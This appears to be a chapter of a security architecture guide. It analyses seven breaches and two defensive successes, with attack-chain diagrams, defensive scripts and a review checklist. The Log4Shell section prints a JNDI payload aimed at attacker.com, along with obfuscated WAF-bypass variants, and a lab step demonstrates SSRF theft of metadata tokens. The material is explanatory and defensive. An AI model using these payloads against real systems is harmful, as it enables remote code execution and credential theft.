Section 10

Real-World Case Studies

Every architecture failure tells a story about controls that were missing, misconfigured, or ignored. These 9 case studies — 7 breaches and 2 success stories — span supply chain attacks, cloud misconfigurations, zero-days, and identity compromise, representing over $5 billion in damages.

Why Study Breaches as an Architect?

The breaches on this page exposed over 400 million records. Every one was preventable with architecture patterns covered in this guide. Understanding how controls failed is more valuable than knowing what controls exist — it transforms checklists into conviction.

Attack Vector Landscape — 9 Case Studies by Category

flowchart TB subgraph ext[" External Attack Surface "] EQ["Equifax 2017\nUnpatched Struts"] CO["Capital One 2019\nSSRF + IMDSv1"] MV["MOVEit 2023\nSQL Injection"] LS["Log4Shell 2021\nLibrary RCE"] end subgraph sup[" Supply Chain / Identity "] SW["SolarWinds 2020\nBuild Compromise"] OK["Okta 2022\nContractor Access"] MS["Storm-0558 2023\nKey Leakage"] end subgraph def[" Successful Defense "] CF["Cloudflare 2023\nZero Trust"] BC["Google BeyondCorp\nNo Perimeter"] end style EQ fill:#f87171,stroke:#000,color:#000 style CO fill:#f87171,stroke:#000,color:#000 style MV fill:#f87171,stroke:#000,color:#000 style LS fill:#f87171,stroke:#000,color:#000 style SW fill:#a855f7,stroke:#000,color:#000 style OK fill:#a855f7,stroke:#000,color:#000 style MS fill:#a855f7,stroke:#000,color:#000 style CF fill:#4ade80,stroke:#000,color:#000 style BC fill:#4ade80,stroke:#000,color:#000

Case Study 1: The Equifax Breach (2017)

What Happened

147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1078 (Valid Accounts)

147M
Records Exposed
76 days
Dwell Time
$1.4B
Total Cost
CVE-2017-5638
Apache Struts RCE

Equifax Attack Chain

flowchart LR A["Recon: Scan for\nApache Struts"] -->|CVE-2017-5638| B["Initial Access:\nRCE via Struts"] B --> C["Persistence:\nWeb Shells"] C --> D["Lateral Movement:\nFlat Network"] D --> E["Collection:\nUnencrypted PII"] E --> F["Exfiltration:\n147M Records"] style A fill:#f87171,stroke:#000,color:#000 style B fill:#f87171,stroke:#000,color:#000 style C fill:#ec4899,stroke:#000,color:#000 style D fill:#a855f7,stroke:#000,color:#000 style E fill:#22d3ee,stroke:#000,color:#000 style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • • Unpatched internet-facing server
  • • Expired SSL certificate on monitoring tool
  • • Flat network allowed lateral movement
  • • Sensitive data not encrypted at rest
  • • Poor network segmentation

Lessons Learned

  • • Automated patch management is critical
  • • Network segmentation limits blast radius
  • • Encrypt sensitive data at rest
  • • Monitor SSL certificate expiration
  • • Defense in depth matters

What Would Have Prevented This

Network segmentation would have blocked lateral movement. Encryption at rest would have rendered stolen data unusable. Automated patching with SLA enforcement (48-hour critical patch window) would have closed the vulnerability before exploitation. Any one of these controls would have dramatically reduced impact — together they represent defense in depth.

Case Study 2: Capital One Breach (2019)

What Happened

106 million records exposed via SSRF attack against misconfigured AWS WAF. Attacker exploited overly permissive IAM role to access S3 buckets.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1552.005 (Cloud Instance Metadata), T1078 (Valid Accounts), T1530 (Data from Cloud Storage)

106M
Records Exposed
$190M
Settlement Cost
SSRF
Attack Vector
IMDSv1
Root Cause

Capital One SSRF Attack Chain

flowchart LR A["Attacker crafts\nSSRF request"] --> B["WAF forwards to\nmetadata endpoint"] B -->|"169.254.169.254"| C["IMDSv1 returns\nIAM credentials"] C --> D["Assume role with\nexcessive S3 access"] D --> E["List & download\nS3 buckets"] E --> F["106M records\nexfiltrated"] style A fill:#f87171,stroke:#000,color:#000 style B fill:#f87171,stroke:#000,color:#000 style C fill:#ec4899,stroke:#000,color:#000 style D fill:#a855f7,stroke:#000,color:#000 style E fill:#22d3ee,stroke:#000,color:#000 style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • • WAF role had excessive S3 permissions
  • • SSRF not blocked by WAF
  • • IMDSv1 allowed credential theft
  • • No detection of unusual API calls
  • • Sensitive data in S3 not adequately protected

Lessons Learned

  • • Apply least privilege to all IAM roles
  • • Use Managed Identities to prevent SSRF credential theft
  • • Monitor Activity Log for anomalous API activity
  • • Regular IAM permission audits
  • • Cloud-native security tools matter

Prevention: Enforce IMDSv2 & Least Privilege

enforce-imdsv2.sh
bash
# Enforce IMDS restrictions — prevents SSRF-based credential theft (Capital One vector)
# Azure: Restrict access to Instance Metadata Service via NSG & Managed Identity
az vm update \
  --resource-group prod-rg \
  --name app-vm-01 \
  --set identity.type="SystemAssigned"

# Audit ALL VMs for public IP exposure and overly permissive NSGs
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table

# Terraform: Enforce Managed Identity and block metadata with Azure Policy
resource "azurerm_linux_virtual_machine" "secure" {
  identity {
    type = "SystemAssigned"  # Use managed identity, not stored credentials
  }

  # No public IP — traffic only from Application Gateway
  public_ip_address_id = null
}
# Enforce IMDS restrictions — prevents SSRF-based credential theft (Capital One vector)
# Azure: Restrict access to Instance Metadata Service via NSG & Managed Identity
az vm update \
  --resource-group prod-rg \
  --name app-vm-01 \
  --set identity.type="SystemAssigned"

# Audit ALL VMs for public IP exposure and overly permissive NSGs
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table

# Terraform: Enforce Managed Identity and block metadata with Azure Policy
resource "azurerm_linux_virtual_machine" "secure" {
  identity {
    type = "SystemAssigned"  # Use managed identity, not stored credentials
  }

  # No public IP — traffic only from Application Gateway
  public_ip_address_id = null
}

What Would Have Prevented This

Managed Identity blocks SSRF-based credential theft entirely. Least privilege RBAC (scoping the WAF role to only its required storage paths) would have limited blast radius to near zero. Activity Log anomaly detection would have flagged the unusual bulk storage ListBlobs/GetBlob calls.

Case Study 3: SolarWinds Supply Chain Attack (2020)

What Happened

Nation-state attackers compromised SolarWinds' build system, injecting malware into Orion software updates. 18,000+ organizations installed the backdoor.

Architecture Failures

  • • Build server compromise went undetected
  • • Code signing didn't prevent injection
  • • Trusted software had excessive network access
  • • Minimal monitoring of outbound traffic
  • • Domain fronting evaded detection

Lessons Learned

  • • Secure the software supply chain
  • • Reproducible builds for verification
  • • Monitor build system integrity
  • • Zero Trust for internal software too
  • • Limit network access of monitoring tools

SolarWinds Supply Chain Attack Flow

flowchart TD A["Attacker compromises\nSolarWinds build server"] --> B["Malicious DLL injected\ninto Orion update"] B --> C["Signed with valid\nSolarWinds certificate"] C --> D["18,000+ orgs install\ntrusted update"] D --> E["SUNBURST backdoor\nbeacons to C2"] E --> F["Lateral movement in\nhigh-value targets"] style A fill:#f87171,stroke:#000,color:#000 style B fill:#f87171,stroke:#000,color:#000 style C fill:#ec4899,stroke:#000,color:#000 style D fill:#a855f7,stroke:#000,color:#000 style E fill:#22d3ee,stroke:#000,color:#000 style F fill:#4ade80,stroke:#000,color:#000

Prevention: Supply Chain Integrity Verification

supply-chain-verify.sh
bash
# === Supply Chain Integrity (lessons from SolarWinds) ===

# 1. Verify SLSA build provenance
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ghcr.io/org/app:latest

# 2. Generate and scan SBOM for vulnerabilities
syft packages ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical

# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest

# 4. Monitor build system integrity (cron job)
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alert
# === Supply Chain Integrity (lessons from SolarWinds) ===

# 1. Verify SLSA build provenance
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ghcr.io/org/app:latest

# 2. Generate and scan SBOM for vulnerabilities
syft packages ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical

# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest

# 4. Monitor build system integrity (cron job)
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alert

Case Study 4: Log4Shell (2021)

What Happened

CVE-2021-44228 — a critical RCE in Apache Log4j (CVSS 10.0). JNDI lookups in log messages allowed remote code execution. Affected virtually every Java application.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

CVSS 10.0
Maximum Severity
100%
Java Apps Affected
24 hrs
Mass Exploitation
CVE-2021-44228
Log4j2 RCE

Log4Shell Attack Flow

flowchart LR A["Attacker injects JNDI\nstring via HTTP header"] --> B["Log4j processes\nlog message"] B --> C["JNDI lookup triggers\noutbound LDAP"] C --> D["Attacker LDAP returns\nmalicious Java class"] D --> E["Remote Code\nExecution"] E --> F["Cryptominer /\nRansomware /\nBackdoor"] style A fill:#f87171,stroke:#000,color:#000 style B fill:#f87171,stroke:#000,color:#000 style C fill:#ec4899,stroke:#000,color:#000 style D fill:#a855f7,stroke:#000,color:#000 style E fill:#22d3ee,stroke:#000,color:#000 style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • • Logging library had network call capability (violates economy of mechanism)
  • • No SBOM — orgs didn't know where Log4j was deployed
  • • Egress filtering not enforced (allowed LDAP/RMI outbound)
  • • WAFs bypassed with obfuscation (${lower:j}ndi)

Lessons Learned

  • • Maintain SBOMs for all applications
  • • Restrict egress traffic by default
  • • Libraries should follow least privilege
  • • Defense in depth — patching alone isn't enough

Payload Anatomy — Why WAFs Weren't Enough

Basic payload: ${jndi:ldap://attacker.com/a}

Attackers rapidly developed obfuscated variants to bypass WAF rules:

  • ${${lower:j}ndi:ldap://...} — case manipulation
  • ${${::-j}${::-n}${::-d}${::-i}:ldap://...} — string slicing
  • ${${env:NaN:-j}ndi:ldap://...} — env variable defaults

These bypassed simple WAF rules matching exact "jndi:" strings — demonstrating why egress filtering (blocking outbound LDAP/RMI) was the critical control, not just input filtering.

Detection & Response Playbook

log4shell-response.sh
bash
# === Log4Shell (CVE-2021-44228) Detection & Response ===

# 1. Find vulnerable Log4j JARs
find / -name "log4j-core-*.jar" 2>/dev/null | while read jar; do
  version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
    grep Implementation-Version | cut -d' ' -f2)
  echo "$jar -> v$version"
done

# 2. Scan logs for exploitation attempts
grep -rn 'jndi:' /var/log/ 2>/dev/null

# 3. Block outbound JNDI protocols (egress containment)
iptables -A OUTPUT -p tcp --dport 389 -j DROP   # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP   # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP  # RMI

# 4. Emergency mitigation: remove JndiLookup class
zip -q -d log4j-core-*.jar \
  org/apache/logging/log4j/core/lookup/JndiLookup.class

# 5. Permanent fix: upgrade to Log4j >= 2.17.1
# === Log4Shell (CVE-2021-44228) Detection & Response ===

# 1. Find vulnerable Log4j JARs
find / -name "log4j-core-*.jar" 2>/dev/null | while read jar; do
  version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
    grep Implementation-Version | cut -d' ' -f2)
  echo "$jar -> v$version"
done

# 2. Scan logs for exploitation attempts
grep -rn 'jndi:' /var/log/ 2>/dev/null

# 3. Block outbound JNDI protocols (egress containment)
iptables -A OUTPUT -p tcp --dport 389 -j DROP   # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP   # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP  # RMI

# 4. Emergency mitigation: remove JndiLookup class
zip -q -d log4j-core-*.jar \
  org/apache/logging/log4j/core/lookup/JndiLookup.class

# 5. Permanent fix: upgrade to Log4j >= 2.17.1

Case Study 5: Okta / Lapsus$ (2022)

What Happened

Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.

MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)

Architecture Failures

  • • Third-party contractor had admin-level access
  • • No separation of privilege for support tools
  • • Delayed incident disclosure (2 months)
  • • Insufficient access logging on contractor sessions

Lessons Learned

  • • Apply Zero Trust to third-party access
  • • Time-boxed, audited contractor sessions
  • • Separation of duties for admin tools
  • • Rapid incident communication to customers

Case Study 6: MOVEit Transfer (2023)

What Happened

CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)

Architecture Failures

  • • SQL injection in 2023 — basic input validation missing
  • • Web shell deployment not detected
  • • File transfer app directly on internet without WAF
  • • Mass data exfiltration went unnoticed

Lessons Learned

  • • Never expose file transfer tools directly to internet
  • • WAF + IDS in front of all public-facing apps
  • • Monitor for web shell indicators
  • • DLP to detect bulk data exfiltration

Detection: Web Shell Hunting & File Integrity

moveit-hardening.ps1
powershell
# === File Transfer Server Hardening (lessons from MOVEit) ===

# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
  Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
  Select-Object FullName, LastWriteTime, Length

# 2. File integrity monitoring vs. known-good baseline
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse |
  ForEach-Object {
    $hash = (Get-FileHash $_.FullName -Algorithm SHA256).Hash
    $known = $baseline | Where-Object { $_.Path -eq $_.FullName }
    if (-not $known -or $known.Hash -ne $hash) {
      Write-Warning "ALERT: $($_.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
    }
  }

# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLP
# === File Transfer Server Hardening (lessons from MOVEit) ===

# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
  Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
  Select-Object FullName, LastWriteTime, Length

# 2. File integrity monitoring vs. known-good baseline
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse |
  ForEach-Object {
    $hash = (Get-FileHash $_.FullName -Algorithm SHA256).Hash
    $known = $baseline | Where-Object { $_.Path -eq $_.FullName }
    if (-not $known -or $known.Hash -ne $hash) {
      Write-Warning "ALERT: $($_.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
    }
  }

# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLP

Case Study 7: Microsoft Storm-0558 (2023)

What Happened

Chinese threat actor acquired a Microsoft consumer signing key from a crash dump, using it to forge Azure AD tokens and access government email accounts.

MITRE ATT&CK: T1552.004 (Private Keys), T1606.002 (SAML Tokens), T1114.002 (Email Collection)

Architecture Failures

  • • Signing key in crash dump (dev environment leak)
  • • Consumer key accepted by enterprise service (validation gap)
  • • No key rotation forced after potential exposure
  • • Cloud audit logs not available to affected tenants

Lessons Learned

  • • Strict key isolation between consumer/enterprise
  • • Sanitize crash dumps for sensitive material
  • • Token validation must check issuer scope
  • • Log access must be available to all customers

Case Study 8: Cloudflare Thanksgiving 2023 (Positive)

What They Did Right

Nation-state attacker (likely related to Okta breach) used stolen OAuth tokens to access Cloudflare's Atlassian server. Due to Zero Trust architecture, the blast radius was minimal despite initial access.

Why the Damage Was Limited

  • • Zero Trust segmentation — Atlassian couldn't reach production
  • • Rotation of all 5,000 credentials after Okta incident (proactive)
  • • Detection within hours via anomalous access patterns
  • • Transparent public disclosure with full timeline
  • • "Code Red" remediation — rotated every credential, even those not known compromised

Key Architecture Decisions

  • • Assume breach mentality operationalized
  • • Network segmentation prevented lateral movement to production
  • • Comprehensive logging enabled rapid forensics
  • • Incident response plan executed within minutes

Case Study 9: Secure Architecture Success - Google BeyondCorp

What They Did Right

After the Aurora attacks, Google rebuilt their security model. BeyondCorp eliminated the corporate network perimeter, implementing Zero Trust before it had a name.

Architecture Decisions

  • • No trusted network—all access is identity-based
  • • Device trust established through inventory and health
  • • Access Proxy mediates all application access
  • • Context-aware access policies
  • • Works the same from office, home, or coffee shop

Results

  • • Eliminated VPN for most use cases
  • • Consistent security regardless of location
  • • Reduced attack surface dramatically
  • • Better user experience than VPN
  • • Model widely adopted as Zero Trust

Architecture Review Template

Security Architecture Review Checklist

1. Data Security
  • ☐ Data classification completed
  • ☐ Encryption at rest for sensitive data (AES-256)
  • ☐ TLS 1.2+ for all data in transit
  • ☐ Key management strategy defined (KMS/HSM)
  • ☐ Data retention and disposal policy
2. Identity & Access
  • ☐ Authentication mechanism defined (OAuth 2.0/OIDC)
  • ☐ MFA enforced for all human access
  • ☐ Authorization model documented (RBAC/ABAC)
  • ☐ Service-to-service auth specified (mTLS/JWT)
  • ☐ Least privilege applied and verified
  • ☐ Account lifecycle management (JIT, deprovisioning)
3. Network Security
  • ☐ Trust boundaries identified and documented
  • ☐ Network segmentation designed (VPC, subnets)
  • ☐ Ingress/egress controls defined
  • ☐ DDoS mitigation considered
  • ☐ DNS security (DNSSEC, DoH/DoT)
4. Application Security
  • ☐ Input validation at every trust boundary
  • ☐ OWASP Top 10 / API Top 10 mitigations
  • ☐ Secrets management (no hardcoded credentials)
  • ☐ Security headers configured (CSP, HSTS, XFO)
  • ☐ Dependency scanning in CI/CD pipeline
5. Operations & Resilience
  • ☐ Logging and monitoring strategy (SIEM/XDR)
  • ☐ Incident response plan documented and tested
  • ☐ Backup and recovery tested (RTO/RPO defined)
  • ☐ Patch management process with SLAs
  • ☐ Supply chain security (SBOM, vendor review)

Document Your Decisions

Architecture Decision Records (ADRs) capture why security decisions were made. Future teams need to understand the context to avoid undoing security controls. See Reference Architectures for an ADR template.

Framework Alignment

MITRE ATT&CK: Techniques referenced per case study above
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: A.5.24 (Information Security Incident Management), A.5.25 (Assessment of Information Security Events)
Related: Security Frameworks → | Reference Architectures →

Cross-Cutting Analysis: Patterns Across Breaches

Mapping architectural failures across all 7 breaches reveals which controls deliver the most protection. The table below shows which failures contributed to each incident.

Architecture Failure Equifax CapOne Solar Log4j Okta MOVEit Storm Count
Inadequate monitoring / logging6
Excessive privileges / permissions4
Supply chain / third-party trust3
Missing / late patching3
No egress filtering3
Missing network segmentation2
No SBOM / asset inventory1
Data not encrypted at rest2

Key Takeaway: Prioritize Detection

Inadequate monitoring appears in 6 of 7 breaches — it's the single most common enabler. Excessive privileges is second. The Cloudflare and BeyondCorp success stories both demonstrate that Zero Trust + comprehensive logging is the architecture that limits blast radius even when initial access occurs. Prioritize detection, least privilege, and supply chain verification in your architecture reviews.
🎯

Architecture Case Study Labs

Apply breach analysis techniques to real-world scenarios and strengthen your architecture review skills.

🔧
Breach Post-Mortem Analysis Custom Lab medium
Select a recent public breach from CISA advisories or NVDMap the full attack chain using MITRE ATT&CK techniquesIdentify which architecture controls failed or were absentDesign before/after architecture diagrams showing what would have prevented the breachWrite an Architecture Decision Record (ADR) for each proposed fix
🔧
SSRF & Cloud Metadata Hardening Lab Custom Lab hard
Deploy a vulnerable web app on an Azure VM with a public IP and overly permissive NSGDemonstrate SSRF to retrieve managed identity tokens from the metadata APIRemove the public IP, enforce Managed Identity, and verify the SSRF attack is mitigatedImplement least-privilege RBAC roles and verify reduced blast radiusConfigure NSG Flow Logs and Azure Monitor alerts to detect the attack pattern
🔧
Supply Chain Security Assessment Custom Lab hard
Generate SBOMs for your applications using SyftScan SBOMs for known vulnerabilities using GrypeImplement artifact signing with Cosign and SigstoreVerify SLSA build provenance for a container imageCreate a dependency update policy with automated PR reviews